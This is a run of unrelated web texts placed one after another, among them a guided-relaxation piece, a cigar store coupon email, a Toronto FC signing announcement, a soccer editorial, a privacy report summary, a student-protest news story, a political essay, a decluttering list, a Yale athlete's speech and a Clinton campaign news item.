What is a happy place ? I do n't want to sound like Mr . Obvious but it is a Happy Place . In fact , it is the happiest place we can be in . The most awesome thing about this “ Happy Place ” is that we do n't have to travel anywhere to get there .
Our happy place is in our mind . In our Inner World we have a sacred garden that we protect no matter what . This sacred garden is surrounded by walls keeping everything bad outside of it . That 's where our happy place is .
We may not realize this but Everything that We Fear of the Outer World lives in our Inner World . That 's why we need to protect our happy place to remain sacred .
Everything that we ever wanted ; every dream we ever wanted to become a reality ; every wish and longing we ever had lives in our sacred garden – in our happy place .
As Humans , We Do Something Better than Any Species on Earth – we may actually be the only species to be able to do this . This special ability we have is our imagination .
Our imagination enables us to visualize things before they even happen and our whole Inner World is a product of that . Our Inner world is the fundament of our psychological profile . It is what we call our Spirit – Character .
Because we are able to visualize things that never happened we are able to create a place that makes us feel safe ; a place that gives us hope and motivation to keep following our dreams .
This place is like a sneak peak of what our life would be if we succeed . The purpose of our happy place is to give us a mini vacation into our desired future so we can recharge our batteries , remember why we work in the first place and get back to making our dreams reality with full steam .
It is necessary to remind ourselves once in a while that there is light at the end of the tunnel ( and it is not a train ) .
So how to find your happy place ?
If you are easily distracted go somewhere free of distractions ( turn off your phone , TV , computer ) and make yourself comfortable . Close your eyes and focus on your breathing . Count 5 exhales and start scanning your body ; feel your toes , knees , legs , torso , hands , fingers , shoulders , neck , mouth , eyes , head . After you are aware of your whole body take a deep breath and relax it with your slow exhalation ; do this 3 times and with every time become more and more relaxed . Picture a garden and a fountain in the midst of the garden ; try to listen to the water , try to smell the nature , try to feel the grass under your toes . You are safe here ; there is nothing that can possibly hurt you . Explore the garden ; come near the fountain , feel the material it is made of – just feel free to get to know your sacred garden . Now I want you to look into the water and ask yourself “ What would my Dreamland look like ? ” Picture the water morphing into your Dreamland ; everything you ever wanted is in there – explore it , feel it , experience it . Just let yourself enjoy this place ; become completely free to do whatever you like . After a couple of minutes it is time to get back to your sacred garden . Focus on your breathing again and count down from 5 to 1 ; on 1 start moving your fingers and toes . Welcome back .
If you want , PLEASE , feel free to share with us how your Dreamland looked like . My personal Dreamland is very similar to a Hawaiian island with the sun setting into the ocean while a calming sound of a ukulele plays in the background . And yes , I have my surf board on my right hand and a coconut cocktail on my left .
Email not displaying correctly ? View it in your browser . SPECIALS VALID THROUGH 06/23/2014 OR WHILE SUPPLIES LAST
On behalf of the entire Cigar King Family , we hope you all had a wonderful Father 's Day ! No matter whether you were celebrating your father , or being celebrated yourself , we truly hoped you enjoyed your day .
It 's customary to get a gift on Father 's Day , but I 'm sure many of you did not receive your burning desire for premium cigars . As dads who do n't often receive the gift of cigars , cigar accessories , or other toys that tickle our fancy , we get it ! So , we 're here to help relieve the woes and enhance your sense of well-being . Go ahead , treat yourself !
This week we have another great opportunity to save some serious dough as we roll out another great coupon offer to you , our loyal , valued customer base . Let this coupons help you save some cash and get what you really wanted for Father 's Day !
So here is the how it works :
Step 1 - Add lots and lots of stuff to your cart . It can be pretty much anything you want . There are a few restrictions which are listed at the bottom of the page . BUT , over 98 % of our inventory is available for use with the coupon . Also , there is no minimum purchase !
Step 2 - At checkout , enter coupon code PFD2014 to take up to 20 % off your entire order !
CLICK HERE TO START SHOPPING
CLICK HERE TO ORDER ROYAL FLAVORS CIGARS
- AS LOW AS $ 10.00 A BOX -
At $ 1.49 a stick , who really cares what is in the bag . I can tell you this : we walked through the humidor and really cleaned the place up . We made lots and lots of these bags . We took assorted shapes and sizes , assorted brands and put them together to create these grab bags . It 's a mystery until you receive them but I can tell you that we 've seen some really good cigars go into some of these bags .
CLICK HERE TO ORDER A MYSTERY GRAB BAG * BONUS COUPON EXCLUSIONS AND FREE SHIPPING OFFERS :
- Discounts are for merchandise only , it does not apply to shipping costs or taxes .
- Promotional code must be entered in the `` Payment Information '' section at checkout to redeem .
- Coupons may not be used on sale items . Coupon not valid on prior purchases .
- Coupon can not be combined with any other offer .
- Free shipping and Flat Rate Shipping offers are only valid for shipping within the continental us . All orders with free shipping will be shipped via FedEx , USPS , or other carrier delivery services at our discretion .
- Delivery by Father 's day is only for shipments within the continental US .
- Free Shipping is for boxes only . 5 Packs are excluded from Free Shipping Promotion
The Following Brands/Products are excluded for the coupon offer and do not qualify for an additional discount .
- All National Brand Bundles
- All Perdomo Fresco Bundle
- All Cigar King Nude Phaties & Other Cigar King Bundles
- All Flor de Oliva Bundles
- All Liga Privada Cigars
- All Phat-King Bundles
Other notes & Disclaimers
We are not responsible for typographical errors . Prices and offers are subject to change without notice . Sale prices are not retroactive and are only valid while supplies last . Cigar King does not sell tobacco to minors or persons under the age of 21 . Cigars King does not sell cigarettes of any kind . If you are under 21 years old , please do not enter our site . If you have any questions , please feel free to contact us . Thank you . 20
The Department of Creativity is a new co-working space near the Florida Mall and they are inviting creatives from around Orlando to join them in a discussion about `` the future of storytelling . ''
6:00pm -Doors Open , Networking : there will be 30 minutes of networking , snacking and project sharing .
6:30pm-7:30pm - Panel & Discussion with :
Derek Alan Rowe : Filmmaker / Virtual Reality producer and co-founder of Doctrine Creative .
Marco DiGeorge : Professional actor and founder of the Truthful Acting Studios and Theater On The Edge
David Nixon : Veteran film producer and director ; owner of DNP Studios
DIVINCI : Producer/Musician from SOLILLAQUISTS OF SOUND
Kunal Patel : Game developer ; founder of Game Space Orlando and Indie Nomicon
( The panel will be recorded and filmed for the D.O.C . podcast . )
7:30pm : Everyone is invited to continue sharing projects , networking until their brains get tired .
- - - - - - -
Project Sharing Spaces :
There are 4-5 tables and break-out areas setup around the event area where you can setup and share what you are working on . Currently we will have a Virtual Reality ( VR ) station sharing innovative examples of storytelling .
- - - - - - -
We are hoping to put on these events on a regular basis in order to inspire everyone to think outside of what has been done and starting think about what can be done to tell stories that inspire the world !
Toronto FC announced Friday that the club has signed American international forward Hérculez Gómez . Prior to signing , the club acquired the right of first refusal from Sporting Kansas City in exchange for allocation money . As per club and league policy , terms of both deals were not disclosed . They will be added to the roster upon receipt of their International Transfer Certificate ( ITC ) and Canadian work permit .
Gómez , 33 , joins Toronto FC after most recently playing for Puebla Fútbol Club ( Puebla F.C . ) of Mexico 's Liga MX . Gómez spent the past season on loan at the club where they made 13 appearances and scored one goal . Puebla F.C . captured the Copa MX : Clausura 2015 .
“ Adding a player with Hérculez Gómez experience and ability was very important at the deadline . They are a proven winner having won both the MLS Cup and U.S. Open Cup with LA Galaxy . They have also won domestic titles and played in the finals of the CONCACAF Champions League while playing in Mexico , ” said Toronto FC General Manager Tim Bezbatchenko . “ He is an accomplished goal scorer and we will benefit from having someone of their pedigree join Toronto FC . ”
Gómez began their professional career with Cruz Azul Fútbol Club , A.C. ( Cruz Azul ) in 2001 , on the second-division squad . They moved to San Diego Gauchos of USL Premier Development League for the 2002 season and made 17 appearances for the club scoring 17 goals . Following their time with the Gauchos , Gómez signed with LA Galaxy where they remained with the team from 2002 - 2006 making a combined 66 appearances , registering 23 goals , six assists featuring in MLS league play , MLS playoffs and U.S. Open Cup matches . During the 2005 season , they scored the game-winning goal in the Lamar Hunt U.S. Open Cup Finals and helped LA capture the double when they won the MLS Cup . During the 2003 season , they spent time on loan with Seattle Sounders of the USL First Division . Gómez was later traded to the Colorado Rapids where they spent two seasons with the club ( 2007-2008 ) appearing in 37 matches , registering six goals and three assists . On April 7 , 2007 in their first game for Colorado , Gómez scored the first goal in the history of Dick 's Sporting Goods Park in a 2-1 win over D.C. United . Gómez was acquired in a trade by the then Kansas City Wizards on September 3 , 2008 . They scored an injury time winner against the San Jose Earthquakes , helping the Wizards qualify for the 2008 MLS Playoffs . They remained with the team until 2009 making a total of 37 appearances across all competitions registering one goal and five assists .
Following their time in the MLS , Gómez signed with five different Mexican Liga MX Clubs from 2010-2013 Puebla F.C. , Club de Fútbol Pachuca ( C.F . Pachuca ) , Club de Fútbol Tecos de la Universidad Autónoma de Guadalajara ( Estudiantes Tecos ) , Club Santos Laguna S.A. de C.V. ( Santos Laguna ) and Club Tijuana Xoloitzcuintles de Caliente ( Club Tijuana ) . With Puebla F.C . they appeared in 15 matches registering 10 goals in all competitions ( 2010 ) . In 2011 , Gómez appeared in 34 matches registering five goals across all competitions with C.F . Pachuca . They then moved to Estudiantes Tecos and appeared in 16 matches scoring seven goals in Liga MX Apertura ( 2011 ) . With Santos Laguna , Gómez appeared in 61 matches registering 22 goals across all competitions . They helped Santos Laguna capture the Mexican Primera División : Clausura 2012 as well as finishing runner-up in the 2011–12 and 2012–13 CONCACAF Champions League . During the 2013 season , Gómez appeared in 15 matches registering three goals with Club Tijuana . Gómez went on two separate loan spells , in 2014 with Club de Fútbol Tigres de la Universidad Autónoma de Nuevo León ( Tigres UANL ) and most recently with Puebla F.C .
Gómez has earned 24 caps for the United States National Team and has scored six goals . They made their debut with the U.S. as a substitute on June 29 , 2007 during a 4-1 defeat in the 2007 Copa América group stage match against Argentina . Gómez featured in both the 2010 FIFA World Cup and was part of the team that captured the 2013 CONCACAF Gold Cup .
Hérculez Gómez
Position : Forward
Height : 5'10
Weight : 160 lbs
Birthdate : April 6 , 1982 ( age 33 )
birthplace : Los Angeles , CA
Hometown : Las Vegas , Nev .
Nationality : American
Last Club : Puebla Fútbol Club ( Liga MX ) on loan from Club Tijuana
How Acquired : Signed with Toronto FC on Friday , August 7 , 2015
Pronunciation : “ Hur-cue-leez Go-mezz ”
( Editorial ) – Michael Bradley has long been a name on the team sheet that people expect to be at every tournament and every friendly match , but they should n't be so safe when the USMNT makes their roster decisions . Over the period of the last few years , during the time they went from AS Roma in the Serie A back to America to play in Major League Soccer , they have regressed as a footballer and needs to be dropped . Not only has a large portion of their performances dictated that they do n't necessarily deserve a guaranteed spot , but there are other names in the USMNT player pool that deserve a chance .
Michael Bradley Should Be Dropped From The USMNT
The one thing that you 're likely to hear when talking to supporters from the USMNT is this , they want their players playing in the top leagues in Europe . This opinion is n't shared by everyone , but is a widely held one for those who are more concerned about the results of the national team rather than the domestic leagues . Can an argument really be made that a younger player would be better served playing in MLS over the English Premier League , Serie A , La Liga , or the Bundesliga ? To answer that question logically , no . Although the development of the domestic league is pivotal for the long-term development of the national team , the best young Americans should obviously be playing in the best leagues around the world . So , when you hear of a player who 's supposed to be one of the nation 's pivotal pieces moving from Serie A back to MLS , what do you think of ? That the player has regressed or that they are n't good enough to play in Europe anymore , and both are the case with Michael Bradley .
The Numbers
Bradley started their European playing career in Eredivisie with Heerenveen in 2006 before moving in 2009-10 to play with Borussia Monchenglabbach , a German team that has taken an apparent liking to USMNT players . During their time with Borussia they were a regular on the team sheet , and rewarded their faith in them with some relatively decent performances , especially for a young and unproven player from a non-traditional soccer nation . The numbers , however , showed that they were nothing short of average in possession , a point that will be touched on later . In their two seasons there , accumulating 48 appearances for the first team , they had a pass success rates of 78.6 % and 73.5 % respectively to go along with five goals and four assists in total—generally not numbers you 're looking for in a regular starter in the middle of the pitch .
After two relatively decent seasons in Germany , they moved on to Italy to play in the Serie A with Chievo Verona , where they made 35 appearances in their only season there . Despite only having a single goal and assist to their name , as well as a subpar 79.2 % pass success rate , they were able to rack up over 3,000 minutes and garner interest from one of the top teams in Italy : AS Roma . They experienced one of the best seasons , in terms of passing and not wasting possession , in their European career with Roma , but quickly fell out of favor in Rome the following season , leading them back across the pond to MLS . This is because , as is shown by the average stats for a central midfielder , that they are decent enough to play in Europe , but is n't good enough to make an actual impact . During the end of their only full year in Rome , and the short period in the season after , they showed that they were able to keep up with the pace , but never did anything of significance . So why is they still one of the first names on the team sheet for the USA ?
The Message To Be Taken
Michael Bradley is a fairly inefficient passing midfielder , who specializes in ineffective passes , especially when playing in the big tournaments . The Copa America match against Argentina is a perfect example , as they were consistently poor in possession . And , even when they were completing a pass , it was so immensely ineffective that it did nothing to help the positioning of their teammates , and created virtually no attacking options moving up the pitch . This has become a fairly common occurrence for Bradley on the big stage , and it 's exactly the reason that they need to take a forced hiatus from the national team . The same argument can be made for the first match of this tournament , when the USMNT played Colombia in the group stage . Granted these two teams are two of the best in the world , but someone who is considered to be a nations best player should n't be consistently poor against every top opponent that they play . Below this is the passing chart for Michael Bradley against Argentina , and do n't be surprised when it shows how poor they actually are .
As had been requested , here is Michael Bradley 's passing chart : # USMNT pic.twitter.com/2TNm3WGLcr — Thomas Floyd ( @ thomasfloyd10 ) June 22 , 2016
Now , even if you so choose to take the route of forgiving them for their performances during this Copa America , let 's not forget the last Gold Cup , where they played every minute for the United States throughout one of the worst performances the USMNT has ever had in that tournament , and a tournament where their subpar play was masked by a phenomenal tournament from Clint Dempsey . They have had some decent performances sprinkled in here and there , but seriously , when was the last time you remember Michael Bradley being the difference between the USA winning and losing in a meaningful match ? This point is n't being beaten into the supporters ' heads over and over to say that they should never be selected again , but rather that a message needs to be sent that the USA expects more from their national team , their players , and most definitely out of their captain . A captain is supposed to lead by example and pave the way for the team , and if this is the path the nation is going to take , one where a player continues to be awarded for poor performances in important tournaments , then do n't expect much for the immediate future .
The United States Expects More
You can go on all day about the tournaments and teams he 's played for , and the performances he 's efficiently went missing in , but the fact remains that this nation simply expects more . When Bradley is at the top of their game it 's not even an arguable point that they are the United States ' most valuable player , but that has n't been happening at a frequency that should be expected of the captain . The supporters of the USMNT have instead chosen to delve into the age old rhetoric of the formations being chosen , the players being called up , and blaming the manager for the problems that lie with the players . Now , Jurgen Klinsmann is n't an angel in this case , but when will the supporters start to expect more and chastise the players as much as they do the manager ? In a nation of over 320 million people , a large portion of whom are immigrants from all over the world , it is nothing short of unacceptable that the USMNT is n't at least putting up a fight against some of the top nations .
The best way to send the message that these performances will no longer be accepted , and that the USA demands more of their players , is to drop the players who are causing the problem , and Bradley is definitely not an exceptiont . Bradley , along with a few other names that come to the forefront , need to be dropped in favor of players who are younger , hungrier , and want to prove that they have what it takes to take this national team into a new era , and a more successful time . Bradley will , of course , play a pivotal role in the transitional period into the future , but the point remains , the United States expects more . Expecting more from our team goes hand in hand with criticizing them when necessary , and that starts with the leader .
USA Soccer will never be taken seriously if the players are n't ridiculed says @ ColinCowherd . https : //t.co/MUGonFI1cn pic.twitter.com/5VaKdfugwr — FOX Sports Radio ( @ FoxSportsRadio ) June 22 , 2016
Main Photo :
The World Privacy Forum has issued a new report :
New forms of sophisticated digital signage networks are being deployed widely by retailers and others in both public and private spaces . From simple people-counting sensors mounted on doorways to sophisticated facial recognition cameras mounted in flat video screens and end-cap displays , digital signage technologies are gathering increasing amounts of detailed information about consumers , their behaviors , and their characteristics .
These technologies are quickly becoming ubiquitous in the offline world , and there is little if any disclosure to consumers that information about behavioral and personal characteristics is being collected and analyzed to create highly targeted advertisements , among other things . In the most sophisticated digital sign networks , for example , individuals watching a video screen will be shown different information based on their age bracket , gender , or ethnicity .
While most consumers understand a need for security cameras , few expect that the video screen they are watching , the kiosk they are typing on , or the game billboard they are interacting with is watching them while gathering copious images and behavioral and demographic information . This is creating a one-way-mirror society with no notice or opportunity for consumers to consent to being monitored in retail , public , and other spaces or to consent to having their behavior analyzed for marketing and profit .
The privacy problems inherent in these networks are profound , and to date these issues have not been adequately addressed by anyone . Digital signage networks , if left unaddressed , will very likely comprise a new form of sophisticated marketing surveillance leading to abuses of the collected information .
A hundred more students have joined the occupation , which has support from the likes of Noam Chomsky , Tariq Ali and the Thick of It star Peter Capaldi
Protests against outsourcing campus services at Sussex University escalated yesterday , when around 100 more students forced their way into a university conference room where a four-day long occupation is taking place .
There are now some 150 students inside the top floor of Bramber House . They 're refusing to leave until the university management halts the bidding process for selling off services such as catering to private companies .
The occupation has received much media attention , as well as support from celebrities such as Noam Chomsky , journalist Tariq Ali and Acadamy award-wining actor Peter Capaldi , best known for their part as Malcolm Tucker in BBC sitcom The Thick of It .
But it was not until yesterday that the university 's vice-chancellor , Michael Farthing , responded to the protesters by asking them to leave the building in return for a meeting with the registrar , John Duffy .
Farthing 's eventual response to the occupation did little to entice students away from their pitch . The occupiers replied by saying : `` If dissolving this occupation is the only condition upon which we can meet , then we will not have a meeting . ''
When asked why the university 's management had not acted more promptly , Duffy replied : `` We have n't had time to respond yet , it is not a priority at the moment . '' The university did , however , find time to hire additional security guards over the weekend .
The occupation is n't just a one-off event , it 's the climax of an eight-month long campaign that has encompassed demonstrations , open talks and an online petition . It all began in May 2012 , when Sussex University management said it was to outsource 10 % of the university 's workforce . This means 235 staff – mostly catering and waste disposal workers – will be transfered to external contracts . Many fear that such workers , who are already on low wages , will have their terms and conditions undermined .
So far , the university management has failed to explain its decision , says first-year student Kirsty Chan . `` One main frustration is that we are not able to access the university 's reasons for privatisation . Without the occupation many people on campus would have not known about the university 's plans to outsource . ''
What 's happening here at Sussex is a sign of broader changes in higher education , writes Michael Chessum , organiser for the National Campaign Against Fees and Cuts . They write that the government 's push towards privatisation is transforming universities `` away from a conception of academic or critical community , and towards a model in which managerial governance , research and admissions are directly linked to private business models . ''
Not all students are bothered by the changes at Sussex . As third-year undergraduate Noel Kanyama points out , they may not have a direct impact on students . `` I like to believe that the university would outsource to the best and most suitable bidder ; and that the services would be quality-controlled by the university . ''
What is certain is that the Sussex University occupiers wo n't leave without a fight . With spirits high and excitement in the air , they tell me they `` wish to continue into the foreseeable future . ''
Politics as usual ( Photo : Thomas Hawk / Flickr ) Anti-representative democracy is the view according to which true democracy and true political equality can exist only in the absence of electoral-representative structures that separate citizens from political power . This view is a kind of anti-politics insofar as it rejects the prominent forms of contemporary politics , namely the electoral systems and parliamentary institutions of contemporary democracies . According to anti-representative democracy , these electoral-representative structures need to be radically reformed and , if and when possible , eliminated .
One useful way of articulating the ideal of anti-representative democracy is in terms of anti-oligarchic and anti-plutocratic concerns . The electoral-representative institutions of contemporary democracies are arguably little more than instruments in the hands of corporations and of the super-rich , both of whom control electoral-representative structures through lobbying , the financing of electoral campaigns , the “ revolving doors ” between politics and business , etc . By means of these mechanisms , the richest 1 % can constrain and direct the action of democratically elected politicians , and thereby determine the economic policies that affect ( often negatively ) the remaining 99 % . In the last 35 years , these policies have produced more efficient and subtle ways for the super-rich to extract resources from the planet and from the rest of the population .
The anti-oligarchic rationale for an attack on electoral-representative structures resonates with some of the claims and actions of various protest groups , such as the Spanish 15-M Movement ( and its recent offshoot , Podemos ) , Occupy Wall Street ( and other branches of the Occupymovement ) , the Italian Five Star Movement , as well as some so-called “ populist ” parties in Europe and South America .
There is also another important kind of anti-political attack on electoral-representative structures . This is the call for depoliticization that finds its rationale in the wish to increase the efficiency of decision-making in contemporary democracies . According to this view , many decisions currently taken by elected bodies should instead be taken by independent and unbiased experts , or by strong executives with the advice of experts .
According to this form of anti-politics , parliaments in particular are thought to hinder the efficiency of government : Parliamentary debates and negotiations do not add to the quality of law-making ; they generate incentives for spurious and polemical disagreement and for cross vetoes ; they often allow vocal minorities to hijack or block the lawmaking process ; they work through committees that lack competence to rule over technical issues , etc . So , parliaments should be smaller ; their powers should be fewer and much more constrained ; lawmaking procedures should be simpler and less political ; disagreement should be neutralized ; vocal minorities should be silenced – and so on . Those who support these proposals look with envy at how decisions are made in countries like China . According to them , depoliticization in democratic countries has become a necessity because of the economic war that globalization has generated : If the efficiency and responsiveness of political decision-making in contemporary democracies does not improve , China and similar countries will win this war , and democracy itself will decline and eventually disappear .
A telling instance of this form of anti-politics is a report released in 2013 by JP Morgan – the global financial giant – on the Euro crisis and the need to reform the institutional arrangements of the so-called “ peripheral ” countries in the European Union . According to this report , one problem is the “ anti-fascist constitutions ” of these countries . Such constitutions are said to be problematic because they protect labor rights and the right to protest , and because they result in weak executives and in “ consensus building systems which foster political clientalism. ” The executives are weak relative to the power of elected bodies , such as parliament and local councils . The consensus building system consists in the methods and procedures these elected bodies used to generate decisions , which according to the report are undesirable because they very often lead to expansive fiscal and monetary policies and to labor-friendly regulations .
This example indicates that efficiency-driven anti-politics is often a call for restricting or weakening the democratic oversight on policy-making in order to give more power to the markets and ultimately to corporations and financial firms . Experts – especially economic experts – are never really independent or unbiased . Efficiency driven anti-politics is a weapon in the hands of those who aim to establish an oligarchy-controlled technocracy . This call for depoliticization found expression in the words of the German Chancellor Angela Merkel , who argued in 2011 that democratic parliamentary deliberation should be shaped so as to be “ in conformity with the markets ” ( marktkonform ) .
The representative structures of contemporary democracies are under attack on two opposite fronts . One front finds its motivation in a desire to resist the effects that increasing economic inequalities are having on the distribution of political power , effects that are taking contemporary societies further and further away from the ideal of political equality . This is a proposal to cure the diseased state of democracy by making contemporary democracies more genuinely democratic . The other front proposes to cure democracy by making contemporary democracies less democratic . The proposal is to replace elected bodies with an efficient technocracy . Because of the distribution of real power in contemporary societies , this technocracy can not be anything but an oligarchy-controlled technocracy , which would inevitably exacerbate the concentration of political power that the anti-oligarchic attacks on electoral-representative structures are trying to oppose .
Some might take this diagnosis as indicating that the critiques of electoral-representative structures coming from these two different perspectives counterbalance each other , and that it is thereby important to hold the center by defending and protecting electoral-representative structures . We disagree . We think that the existence and strength of the two kinds of attacks show that the electoral-representative structures have become irremediably obsolete . Even if they played a positive role in the past history of democracy , they are now chronically malfunctioning and are destined to disappear as a result of technological change and globalization . The fight between the two opposite proposals will be crucial for determining the future of democracy and ultimately the future of humanity .
“ The first hour is the ( rudder ) of the day. ” – Henry Ward Beecher
Let 's face it . Mornings can be tough . In many homes , they are famous for containing too much to do and too little time .
But mornings set the mood for the rest of our day . They have the potential to energize us or drain us . They have the opportunity to lift our spirits or drag us down . They can start us on the right foot or the wrong foot .
Given the fact that mornings are so important , it 's wise to spend a few minutes each night preparing your house for tomorrow 's sunrise . After all , a clutter-free house in the morning means less stress , less anxiety , and less time getting prepared for the day . And that benefits everyone in the home !
Contrary to popular misconception , you do n't need to spend hours each night cleaning the house to accomplish a clutter-free morning . Instead , simply stay ahead of the clutter by tackling these ten 60-second decluttering projects before you go to bed each night .
1 . Return shoes/coats to closets . In the winter , add gloves , hats , and scarves to the routine .
2 . Recycle junk mail and newspapers . A new day brings new mail and new news . Keep your table or counter space clutter-free in the morning by removing today 's .
3 . Put away articles of clothing . Some go in the laundry . Some go back in the closet . But none should be left on the floor .
4 . Store media out of sight . Put back all dvd 's , cd 's , video games , and remote controls that were used during the day . The first time you walk into that room tomorrow , you 'll be glad you did .
5 . Process coins and receipts . I 'm sure it was your husband who left the contents of their pockets on your dresser , but either way , it 'll take you only 60 seconds to put those items where they actually belong .
6 . Clear all bathroom surfaces . The first place you 'll go in the morning is the bathroom . It 's also a surprisingly easy room to keep clutter free . Invest the 60 seconds every night to make it happen .
7 . Clean-up homework . Get your kids into the habit of putting away their schoolwork each night before bed rather than scrambling around each morning to find it .
8 . Put kitchen items away . Granted , I 'm assuming you 've done some cleaning up already after dinner . And if you have , it 'll only take you another 60 seconds to tidy up anything that got left out .
9 . Put back toys . Realistically , life does n't allow a clean toy room every evening . But if you have a toy room apart from your living room , spend 60 seconds returning toys to the room where they belong . Or better yet , get your kids into the practice of doing it themselves .
10 . File paperwork . Stay on top of paper and office clutter by handling it the day it arrives .
If you are not in the habit of doing these things , it 'll definitely take longer than 10 minutes the first time . But once you get a handle on each area , the entire project will take you less than 10 minutes… and your morning you will thank you !
Image : BeatPlusMelody
Andrew Heymann , the recently-graduated captain of Yale men 's swimming and diving team , delivered a thoughtful reflection on what they got out of four years as a student-athlete in New Haven , in a speech they gave at the annual Senior Student-Athlete Reception . Heymann will soon be commissioned into the United States Navy ( a fact not lost upon Vice President Joe Biden , who mentioned Heymann in their address at Yale 's Commencement last month ) .
Heymann 's speech , reprinted below , is an excellent perspective on the life of a collegiate student-athlete , and is applicable to NCAA , NAIA , and junior college athletes in every sport :
“ Good afternoon . My name is Andrew Heymann , captain of the Men 's Swimming and Diving team . When the Athletics Administration kindly asked me to speak at this event , I instantly knew that I wanted to take the opportunity to talk about why athletics at Yale , at a place that focuses so heavily on academics , is so important .
My coach , Tim Wise , begins every year the same way . They remind us that their class is the most important , that we will learn more from swimming than from any course or professor at this school . Looking back , I have to admit , I could n't agree with them more .
But over the last four years , it was easy to lose sight of that when I was walking through the snow to practice at 6:00 in the morning to jump into a freezing pool , and as my teammate Mike Lazris would say , “ voluntarily drown ourselves doing under-waters for an hour . ”
It was easy to lose sight of that every time I had to pull an all-nighter coding after a hard practice , then take a midterm the next day , exhausted .
It was easy to lose sight of that every time I had to say “ No ” – no to a party my friend invited me to the night before a meet , no to a family vacation over winter break , no to studying abroad , or taking that awesome seminar , or anything else a “ normal ” Yale student gets to do .
But since swimming ended two months ago , I finally got the opportunity to say “ Yes ” to anything I wanted . And at the same time , as I sat in the library or my room from 4:00 to 6:00 when I felt like I should have been at the pool , I finally figured out the answer to the question “ Why ? ” Why do we do what we do ? Why is dropping half a second in a race , or perfecting a shot , or nailing down the perfect play so important ? I 'm convinced that it boils down to five things , five reasons that make athletics the most important class we take at Yale .
The first is commitment : Before I even showed up on campus , I made a verbal commitment to my coaches , to the swimming program , and to all of you , that I 'd do everything I possibly could to move my team forward . I committed to morning practices , missing school to travel , giving up vacation time , and enduring the rigors of day-to-day training . If you say you 're going to do something , especially if it affects other people , make sure you see it through , and do the best job that you possibly can . Being a Yale athlete has taught me to commit , and never be a quitter .
The second is time management : On average , we spend twenty-five hours a week with each other . That 's twenty-five hours a week we are n't sleeping , socializing , lounging on old campus , or getting school work done . You 're going to have a lot of work in life . How much time you have for family , friends , hobbies , and travel will depend largely on how fast and effectively you get your work done . Athletes are some of the most hirable people on earth , because we get good work done fast . Being a Yale athlete has taught me to be efficient in how I work , and never waste time .
The third is teamwork : Very rarely do you get to pick your team . Most of the time , you have to work with the hand you 're dealt . Whatever team you find yourself part of , remember that every member brings something valuable to the table . The most successful teams put personal differences behind , and pull the best out of every person in order to reach a common goal . I 'd be lying if I told you that everyone on my team was my best friend . However , I respect all of them as teammates , I know how important each of them is to the success of Yale athletics , and I firmly believe that the diversity of our experiences and personalities makes Yale one of the best places to train on earth . Being a Yale athlete has taught me to be a great listener , follower , teammate , and leader .
The fourth is execution under pressure : You need to be your very best when people are relying on you the most . Anyone can perform when the stakes are low , when no one is looking , or when it does n't matter . No one remembers those people . The real question is who can perform when their career is on the line , when the spotlight is on them , or when the success of the team is in jeopardy ? These are the people that leave legacies . Every team has a person that they want taking the game winning shot at the buzzer , that they want anchoring their relay with the meet tied , that they trust unconditionally no matter how high the stakes are . Strive to be that person . Never be scared to perform , especially when everything is on the line . Being a Yale Athlete has taught me to be clutch , and to thrive when someone puts the gun to my head .
The fifth and most important is consistency : I truly believe that consistency is the most important factor of success needed to perform at a high level all the time . I feel that so much of my life is not about having great days as much as it is about avoiding bad days . With the amount of training we do , the amount of school work Yale requires , and the social pressures to invest every free second of your time , it 's easy to get sick , fall behind on work , and have a bad day . As an athlete , you have an amazing opportunity to fight through pain , illness , injury , and any other excuse , to test yourself , and make sure every day is at least decent . Remember that no one cares about your situation when you get up to compete . And on the off chance that you do have a bad day on the field , the worst thing that happens is that you lose – nothing else . When we get out into the real world in the upcoming months , life is n't as kind , is n't as accommodating . Next year , I 'll be working in the U.S. Navy as an Explosive Ordinance Disposal officer under the Naval Special Operations command , working side by side with Navy SEALs to diffuse and render safe any bombs or other ordinance that might explode . If I have a bad day as an EOD technician , someone loses their lives , and it might be me . Keep what you do here in perspective , but remember that each time you put on the Yale uniform , jump in the water , or take the field , that it matters , and that your team can not reach its full potential when even one person is having a bad day .
Navy SEAL Admiral William McRaven delivered the 2014 commencement speech at University of Texas . It 's one of my favorite speeches of all time , and one that I drew inspiration from when deciding what to talk about today . In their speech , Admiral McRaven says that “ you must be your very best in your darkest moments. ” I have that quote written on the wall of my room as a reminder . No matter how good or bad you feel , you must find a way to succeed . Being a Yale athlete has taught me to perform at least at 90 % , one hundred percent of the time , and never to have a bad day .
And that 's it . If you can fully commit to what you do , manage your time , be a good teammate , perform under pressure , and never ever have a bad day , you will probably be successful in whatever you choose to pursue . Despite what anyone tells you , that 's why sports at this school are so important . I learned these five things , skills that can not be learned from any problem set , class , or professor at Yale . And for that , all of our coaches deserve to be commended for the time and effort they put into making this experience possible for all of us .
Thank you for making these last four years so memorable . I worked hard , made awesome friends , had a ton of fun , and always tried to keep a smile on my face . Never forget what Yale athletics are about , who you represent , and the opportunities opened to you as part this program . I will forever hold Men 's Swimming , Yale Athletics , and the relationships that I have developed with every one of you near to my heart , because nothing else has better prepared me for life and career than being a Yale athlete . Good luck . Go Bulldogs . ”
The above is excerpted from an article filed by Josh Mandell '16 for Yale Sports Publicity .
Bill Clinton said voters should support the former secretary of state for president `` if you believe we 've finally come to the point where we can put the awful legacy of the last eight years behind us and the seven years before that . '' | AP Clinton campaign mops up Bill 's 'awful ' gaffe
Hillary Clinton 's campaign early Tuesday morning pushed back against reports that former President Bill Clinton called President Barack Obama 's policies “ awful , ” insisting that only Bernie Sanders ' campaign would openly attack the sitting president .
At a campaign stop in Washington state Monday on behalf of their wife , Clinton highlighted the former secretary of state as a change-maker but acknowledged there may be a few reasons people would n't support them They added , however , that voters should support them “ if you believe we 've finally come to the point where we can put the awful legacy of the last eight years behind us and the seven years before that , ” according to USA Today .
Hillary Clinton campaign press secretary Brian Fallon sought to clarify early Tuesday that the former president was referring to Republican obstruction of Obama when they used the term “ awful . ”
“ Sanders is only Dem in race who actually attacks @ POTUS , ” Fallon wrote , retweeting a report from The Hill in which Sanders criticized Bill Clinton for their comments regarding Obama .
Hillary Clinton often embraces Obama 's presidency on the trail . Sanders , meanwhile , has n't shied away from being critical of the president . But on Monday night they said they did n't know that he 'd “ call President Obama 's 72 straight months of job growth an ‘ awful legacy . ' ”
USA Today updated its report with a statement from Bill Clinton spokesperson Angel Urena , who also maintained that Clinton was referring to Republican obstructionism .
